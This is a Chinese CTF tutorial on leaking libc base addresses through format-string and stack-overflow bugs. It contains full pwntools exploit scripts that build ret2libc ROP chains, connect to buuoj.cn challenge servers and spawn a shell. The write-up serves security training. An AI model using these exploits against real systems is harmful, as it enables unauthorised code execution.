泄漏libc基地址

拿libc基地址

方法一:格式化字符串

  1. 格式化字符串,首先确定输入的 AAAA 在栈上的位置(x)。
  2. 使用 elf.got[fun] 获得got地址。
  3. 利用格式化字符串,构造payload泄漏got地址处的值,recv接受到的字符串中,[4:8]即为fun函数的地址fun_addr。
    • payload = p32(got) + b’%x$s’
    • fun_address = u32(p.recvuntil(b’\xf7’)[4:8])
  4. 利用 LibcSearcher 选择libc的版本。
  5. 最后计算libc的基地址: libcbase = fun_addr - libc.dump(“fun”)
  6. 最后根据基地址libcbase即可计算system函数的绝对地址:
    • sys_addr = libcbase + libc.dump(“system”)
    • sh_addr = libcbase + libc.dump(“str_bin_sh”)
  7. 最后根据获得到的地址即可构造ROP链。
实例:
from pwn import *
from LibcSearcher import *
p=process("./test3")
elf=p.elf

fun_name="read"

#get the fun'got_address
fun_got=elf.got[fun_name]  #0x804c004
fun_plt=elf.plt[fun_name]  #0x8049040
print(hex(fun_got),hex(fun_plt))

p.recvuntil(b"hello\n")

#yichu
payload = p32(0x804c004) + b'%10$s'
p.sendline(payload)


fun_address = u32(p.recvuntil(b'\xf7')[4:8])
print("fun_address:",hex(fun_address))

#base_address
libc = LibcSearcher(fun_name,fun_address)
libc_base = fun_address - libc.dump(fun_name)
print("libc_base :",hex(libc_base))

#get system address and shell address
sys_address = libc_base + libc.dump('system')
sh_address  = libc_base + libc.dump('str_bin_sh')
print("system address:",hex(sys_address))
print("bin_sh address:",hex(sh_address))

方法二:栈溢出

image-20240529174702310

  1. 利用 puts函数 ,泄漏一个函数的got地址,然后输出got地址处的数据,即为该函数的真实地址。
  2. 首先确定栈溢出的位置:ida中查看栈的位置,确定好溢出的偏移。

image-20240529175118360

  1. 使用 ELF.got[fun_name],ELF.plt[‘puts’] ,泄漏 fun_name的got地址和 puts函数的plt地址

  2. 利用栈溢出、got地址、puts函数的plt地址来输出got地址处的值,即fun_name函数的地址:

    • 64位下puts参数传递:利用 rdi寄存器 传递参数,使用指令 **ROPgadget --binary xxx --only ‘pop|ret’ ** 拿到ret_addr用来给rdi传参。
    • 构造 payload = b’a’*(offset)+p64(ret_addr)+p64(got)+p64(puts_plt)+p64(ret)
    • 其中 got 是给调用puts函数是传递的参数,puts_plt是用来调用puts函数,最后ret是执行完puts函数后返回的地址可斟酌选择。(一般用 puts函数 输出 puts函数的地址
    • sendline完成,recv接受fun_name函数的地址: addr=u64(p.recv(6).ljust(0x8,b’\x00’)),其中recv(6)表示只接受6字节的数据, ljust 将接受到的数据 左对齐 ,并且 长度位8个字节 (保证u64转化位无符号整数时满64bit即8字节,否则会报错),不足的用00补充。
    • 然后同样使用 libc = LibcSearcher(‘puts’,addr),libcbase = addr - libc.dump(‘puts’) 选择libc版本计算libc的基地址libcbase。
    • 最后计算 system函数str_bin_sh 的地址:
      • sys_addr = libcbase + libc.dump(‘system’),sh_addr = libcbase + libc.dump(‘str_bin_sh’)

    image-20240529180635845

    实例:
    1. 题目:BUUCTF在线评测 (buuoj.cn)

    2. EXP:

      from pwn import *
      from LibcSearcher import *
      
      context(os='linux', arch='amd64', log_level='debug')
      
      p=remote("node5.buuoj.cn",29996)
      
      elf = ELF('./ciscn_2019_c_1')
      ret_address = 0x400c83
      
      got = elf.got['puts']		#0x602020
      plt = elf.plt['puts']
      #print(hex(got))
      main_address = 0x400B28
      p.recv()
      p.sendline(b'1')
      p.recvuntil(b"encrypted\n")
      
      payload = (b'a'*(0x50+8))+p64(ret_address)+p64(got)+p64(plt)+p64(main_address)
      p.sendline(payload)
      p.recvuntil(b'Ciphertext\n')
      p.recvuntil(b'\n')
      addr=u64(p.recv(6).ljust(0x8,b'\x00'))
      print(hex(addr))
      libc = LibcSearcher('puts',addr)
      libcbase = addr - libc.dump('puts')
      print(hex(libcbase))
      sys_addr = libcbase + libc.dump('system')
      sh_addr = libcbase + libc.dump('str_bin_sh')
      
      p.recv()
      p.sendline(b'1')
      p.recvuntil(b"encrypted\n")
      payload = b'a'*0x58+p64(ret_address)+p64(sh_addr)+p64(0x4006B9)+p64(sys_addr)
      p.sendline(payload)
      p.interactive()
      
      

方法3:

1. write函数溢出(题目里面给出libc的版本)
  1. 利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。

  2. 先看汇编下调用write函数时参数的传递:(以32位为例)长度+地址+1 构造栈时反过来 1+地址+长度

    image-20240530091712374

  3. 溢出EXP:

    #启动题目所给的so文件,so文件需要在同一目录下
    libc=ELF('libc-2.23.so')
    got = elf.got['write']
    plt = elf.plt['write']
    main_addr = 0x08048825
    
    #构造payload,利用write函数输出write函数的实际地址
    payload = b'a'*(0xe7+4)+p32(plt)+p32(main_addr)+p32(1)+p32(got)+p32(4)
    p.sendline(payload)
    #接受返回的地址
    addr = u32(p.recv(4).ljust(4,b'\x00'))
    print(hex(addr))
    
  4. 利用返回的地址计算liba_base,sys_addr,bin_addr地址:

    #计算基地址libabase
    libcbase = addr - libc.sym['write']
    #拿到sys_addr和bin_addr
    sys_addr = libcbase + libc.sym['system']
    str_sh   = libcbase + next(libc.search('/bin/sh'))
    print(hex(sys_addr),hex(str_sh))
    
    #最后利用计算的函数地址和'bin/sh'地址,栈溢出构造ROP
    payload = b'a'*(0xe7+4)+p32(sys_addr)+p32(0)+p32(str_sh)
    p.sendline(payload)
    p.interactive()
    
2. write函数溢出(题目没给给出libc的版本)
  1. 题目地址:BUUCTF在线评测 (buuoj.cn)

  2. 题目没有提供后门函数,但是给了栈溢出和write函数调用:

    image-20240601105706072

    image-20240601104919755

  3. 这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面 没有调用过write函数 ,也可以 直接利用栈溢出 泄漏,因为在栈溢出时,程序会先解析write函数的地址将其填入got表项中:

    from pwn import *
    from LibcSearcher import *
    
    context(os='linux', arch='i386', log_level='debug')
    
    p=remote("node5.buuoj.cn",28334)
    elf=ELF('./2018_rop')
    got = elf.got['write']
    plt = elf.plt['write']
    print(hex(got),hex(plt))
    main_addr = 0x080484C6
    
    #这里程序会跳转到write函数的plt表,由于先前没有调用过write函数,所以此时write函数的got表还未填充地址,要调用write函数,程序会先解析write函数的地址(此时wrie函数的got表会更新),也就能泄漏write函数的地址了。
    payload = b'a'*(0x88+4)+p32(plt)+p32(main_addr)+p32(1)+p32(got)+p32(4)
    p.sendline(payload)
    addr = u32(p.recv())
    print(hex((addr)))
    
    libc = LibcSearcher('write',addr)
    liba_base = addr - libc.dump('write')
    sys_addr = liba_base + libc.dump('system')
    sh_addr  = liba_base + libc.dump('str_bin_sh')
    print(hex(liba_base),hex(sys_addr),hex(sh_addr))
    
    
    payload = b'a'*(0x88+4)+p32(sys_addr)+p32(0)+p32(sh_addr)
    p.sendline(payload)
    
    p.sendline(b'cat flag')
    p.interactive()
    
    

    image-20240601110334585

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/669212.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

力扣之链表专题

1. (LeetCode-21)合并两个有序链表 将两个升序链表合并为一个新的 升序 链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。 示例 1: 输入:l1 [1,2,4], l2 [1,3,4] 输出:[1,1,2,3,4,4]示例 2: 输入:l1 …

AIGC绘画设计——midjourney有哪些好用的关键词?

midjourney有哪些高级关键词? 这一期继续分享一些高级的关键词, 我有一些案例也是从其他博主那学习来的, 但为了尽可能不出错,每个案例都是自己尝试了很多次后才拿出来的。 挑选了几个效果比较好,使用场景较高的类型…

牛客NC164 最长上升子序列(二)【困难 贪心+二分 Java/Go/PHP/C++】

题目 题目链接: https://www.nowcoder.com/practice/4af96fa010c44638a7e112abf65f7237 思路 贪心二分 所谓贪心,就是往死里贪,所以对于最大上升子序列,结尾元素越小,越有利于后面接上其他的数,也就可能变…

这里一定有你不知道的VS调试技巧

目录 使用环境:Visual Studio 2022,如无特殊说明,都是在Debug、x64环境下编译 一.什么是BUG 二.调试快捷键 F9:创建断电或取消断点 条件断点:满足这个条件才触发 F5:启动调试,经常⽤来直接跳到下⼀个断…

Windows通过cmd运行快速启动应用

Windows如何通过cmd运行快速启动应用? 在Windows操作系统中,可以通过配置环境变量的方式将文件的路径配置到环境变量的path中,配置完成后可以在cmd中输入对应的应用名称即可启动应用,具体操作如下: 1. 添加应用程序路径…

【机器学习300问】102、什么是混淆矩阵?

一、混淆矩阵的定义 混淆矩阵是一种用于评估分类模型性能的评估指标。当模型对数据进行预测并将数据分配到预定义的类别时,混淆矩阵提供了一种直观的方式来总结这些预测与数据实际类别之间的对应关系。具体来说,它是一个表格。 二、分类模型性能评估一级…

项目启动 | 宏昌电器牵手盘古信息,数字化制造引领企业高质量发展

随着时代的发展,数字化转型已成为实现企业持续增长和塑造竞争优势不可或缺的关键因素。浙江宏昌电器科技股份有限公司(以下简称为“宏昌电器”)围绕企业战略发展需求,积极加速数字化转型升级进程,以数字化力量推动公司…

VS Code 开发小技巧

VS Code的开发小技巧 添加代码片段 平时开发的时候,可以快速创建一个空白的模板。 一个快速生成代码片段的网站:https://snippet-generator.app/ 打开网站,把常用的模板代码复制进去,就会自动生成VS Code可以使用的代码片段了。…

【上海大学计算机组成原理实验报告】六、内存系统实验

一、实验目的 学习内存访问机制。理解代码和数据的分区存放原理和技术。 二、实验原理 根据实验指导书的相关内容,地址寄存器MAR用来存放要进行读或写的存储器EM的地址。其内容经数据总线DBUS写入,因此必须在数据总线上具有数据后,配合MAR允…

element-ui表格全选

项目场景&#xff1a; 根据项目需求&#xff0c;要求在表格外加【全选】复选框&#xff0c;切换分页也需将每一行都勾选上 实现方式&#xff1a; 借用element-ui文档的这几个方法和属性 <el-checkboxv-model"checkAll"change"handleCheckAllChange"&g…

【linux】宝塔,首页挂载磁盘,显示使用情况

挂载前&#xff1a; 挂载后&#xff1a; 数据无价&#xff0c;建议&#xff1a;备份需要挂载的磁盘&#xff0c;或者使用新磁盘来进行操作。 1、下载自动挂载磁盘的脚本&#xff1a; wget -O auto_disk.sh http://download.bt.cn/tools/auto_disk.sh 2、给脚本添加执行权限&a…

深入剖析Java线程池的核心概念与源码解析:从Executors、Executor、execute逐一揭秘

文章目录 文章导图前言Executors、Executor、execute对比剖析Executors生成的线程池&#xff1f;线程池中的 execute 方法execute 方法的作用execute的工作原理拒绝策略 源码分析工作原理基本知识线程的状态线程池的状态线程池状态和线程状态总结线程池的状态信息和线程数量信息…

LeetCode题练习与总结:路径总和Ⅱ--113

一、题目描述 给你二叉树的根节点 root 和一个整数目标和 targetSum &#xff0c;找出所有 从根节点到叶子节点 路径总和等于给定目标和的路径。 叶子节点 是指没有子节点的节点。 示例 1&#xff1a; 输入&#xff1a;root [5,4,8,11,null,13,4,7,2,null,null,5,1], target…

基于Springboot驾校预约平台小程序的设计与实现(源码+数据库+文档)

一.项目介绍 系统角色&#xff1a;管理员、教练、学员 小程序(仅限于学员注册、登录)&#xff1a; 查看管理员发布的公告信息 查看管理员发布的驾校信息 查看所有教练信息、预约(需教练审核)、评论、收藏喜欢的教练 查看管理员发布的考试信息、预约考试(需管理…

算法题解记录27+++随机链表的复制(百日筑基)

一、题目描述&#xff1a; 题目难度&#xff1a;中等 给你一个长度为 n 的链表&#xff0c;每个节点包含一个额外增加的随机指针 random &#xff0c;该指针可以指向链表中的任何节点或空节点。 构造这个链表的 深拷贝。 深拷贝应该正好由 n 个 全新 节点组成&#xff0c;其中每…

CDH6.3.2安装文档

前置环境&#xff1a; 操作系统&#xff1a; CentOS Linux release 7.7 java JDK &#xff1a; 1.8.0_231 1、准备工作 准备以下安装包&#xff1a; Cloudera Manager: cloudera-manager-agent-6.3.1-1466458.el7.x86_64.rpm cloudera-manager-daemons-6.3.1-1466458.el…

linux安装MYSQL后,利用grep查看MYSQL初始密码

问题描述 linux安装mysql获取初始密码 解决方案&#xff1a; 通过查看日志获取初始密码 grep "password" /var/log/mysqld.loggrep 是一个用于在文本中查找特定字符串的工具。 /var/log/mysqld.log 是要搜索的文件路径&#xff0c;"password" 是要查找的…

树莓集团:构筑全国数字影像生态链

在数字化浪潮席卷全球的今天&#xff0c;数字影像技术正以前所未有的速度改变着我们的生活。成都树莓集团以远见卓识和坚定步伐&#xff0c;专注于全国数字影像生态链的建设&#xff0c;不断推动着文创产业的创新与发展。 树莓集团致力于打造一个完整的数字影像生态链&#xff…

CLIP--Learning Transferable Visual Models From Natural Language Supervision

参考&#xff1a;CLIP论文笔记--《Learning Transferable Visual Models From Natural Language Supervision》_visual n-grams模型-CSDN博客 openAI&#xff0c;2021&#xff0c;将图片和文字联系在一起&#xff0c;----->得到一个能非常好表达图片和文字的模型主题&#…

Java后端代码框架包设计-什么是Domain,BO,VO?我们改如何区分和定义?

我们先来看看一个项目的代码结构,如下图: 1.定义包名用domain这个单词是什么含义 在Java中,domain 这个单词通常用于表示应用程序的“领域模型”(Domain Model)或“领域层”(Domain Layer)。领域模型是描述系统业务逻辑和规则的对象集合,它通常包含实体(Entities)、…